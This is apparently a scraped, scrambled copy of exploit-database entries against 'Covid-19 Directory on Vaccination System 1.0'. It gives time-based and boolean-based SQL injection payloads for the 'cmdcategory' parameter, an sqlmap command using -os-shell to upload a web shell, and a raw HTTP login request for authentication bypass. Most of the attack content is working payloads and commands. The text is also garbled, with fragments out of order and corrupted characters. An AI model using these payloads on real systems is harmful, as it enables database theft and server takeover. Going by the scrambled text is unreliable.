Web application technology: PHP 8.1.2, Apache 2.4.52 Payload: cmdcategory=Private') AND (SELECT 9765 FROM (SELECT(SLEEP(5)))DnRk)- LWnB Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cmdcategory=Private') AND 3773=3773- fUxB Title: AND boolean-based blind - WHERE or HAVING clause Sqlmap resumed the following injection point(s) from stored session: Developers assume no liability and are not responsible for any misuse or damage caused by this program It is the end user's responsibility to obey all applicable local, state and federal laws. legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. Now you have a web shell uploaded to the server : Sqlmap -u ' -p cmdcategory -risk=3 -level=5 -threads=10 -keep-alive -os-shell The Covid-19 Directory on Vaccination System is vulnerable to SQL Injection that leads to Remote Code Execution. # Exploit Title: Covid-19 Directory on Vaccination System 1.0 - 'cmdcategory' SQL Injection Referer: Cookie: PHPSESSID=dras0itihsadtdkkkv7gv4hf67 User-Agent: Mozilla/5.0 (X11 Linux x86_64 rv:78.0) Gecko/20100101 Firefox/78.0Īccept: text/html,application/xhtml+xml,application/xml q=0.9,image/webp,*/* q=0.8Ĭontent-Type: application/x-www-form-urlencoded POST /covid-19-vaccination/admin/login.php HTTP/1.1 > 2- We can login succesfully with SQL bypass method. # Exploit Title: Covid-19 Directory on Vaccination System 1.0 - SQLi Authentication Bypassġ- Go to following url.
0 kommentar(er)
